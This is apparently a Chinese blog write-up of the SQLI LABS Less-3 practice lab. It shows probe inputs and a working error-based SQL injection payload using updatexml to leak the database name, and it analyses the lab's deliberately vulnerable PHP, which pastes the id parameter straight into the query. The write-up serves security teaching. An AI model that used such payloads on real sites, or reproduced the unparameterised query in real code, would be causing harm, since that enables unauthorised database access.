关注这个靶场的其它相关笔记:SQLI LABS —— 靶场笔记合集-CSDN博客
0x01:过关流程
输入下面的链接进入靶场(如果你的地址和我不一样,按照你本地的环境来):
http://localhost/sqli-labs/Less-3/
靶场提示 Please input the ID as parameter with numeric value
要我们输入一个数字型的 ID
作为参数进行查询,那我们就按它的意思传入 id
看看网页返回的结果:
可以看到,服务器返回了对应 id
用户的登录名与登录密码。此时,我们可以再输入几个数据进行测试:
测试 Payload 01: ?id=1 # 结果: Your Login name:Dumb Your Password:Dumb测试 Payload 02: ?id=2 # 结果: Your Login name:Angelina Your Password:I-kill-you测试 Payload 03: ?id=2-1 # 结果: Your Login name:Angelina Your Password:I-kill-you测试 Payload 04: ?id=1' # 结果: 报错
可以看到,当我们传递 Payload 04 给服务器后端时,页面显示了报错信息,并且还返回了部分后端的查询模板,根据泄露的模板,我们可以推测目标后端的 SQL 模板如下:
select username,password from users where id=('$_GET["id"]') LIMIT 0,1;
根据上面的 SQL 模板,我们可以构造如下 Payload 对目标发起攻击:
-- 获取当前服务器正在使用的数据库的名称攻击 Payload: ?id=1') and updatexml(1,concat(0x7e,database(),0x7e),1) --+'笔者备注: 0x7e 是字符 ~ 号,用于标识服务器报出来的数据。
可以看到,我们已经成功获取了当前站点使用的后端数据库的信息。至此,SQLI LABS Less-3 GET-Error based-Single quotes with twist-String 成功过关。
0x02:源码分析
下面是 SQLI LABS Less-3 GET-Error based-Single quotes with twist-String 后端的部分源码,以及笔者做的笔记:
<?php//including the Mysql connect parameters.include("../sql-connections/sqli-connect.php"); // 获取数据库连接参数error_reporting(0);// take the variablesif (isset($_GET['id'])) { $id = $_GET['id']; // 接收 GET 方式传递的 id 参数//logging the connection parameters to a file for analysis.$fp = fopen('result.txt', 'a');fwrite($fp, 'ID:' . $id . "\n");fclose($fp);// connectivity $sql = "SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; // 实际执行的查询语句,也就多加了一个括号而已,没有做任何防护$result = mysqli_query($con1, $sql);$row = mysqli_fetch_array($result, MYSQLI_BOTH);if ($row) {echo "<font size='5' color= '#99FF00'>";echo 'Your Login name:' . $row['username'];echo "<br>";echo 'Your Password:' . $row['password'];echo "</font>";} else {echo '<font color= "#FFFF00">';print_r(mysqli_error($con1)); // 如果服务端没有返回任何信息,则打印错误信息。此处是报错注入的发生点。echo "</font>";}} else {echo "Please input the ID as parameter with numeric value";}?>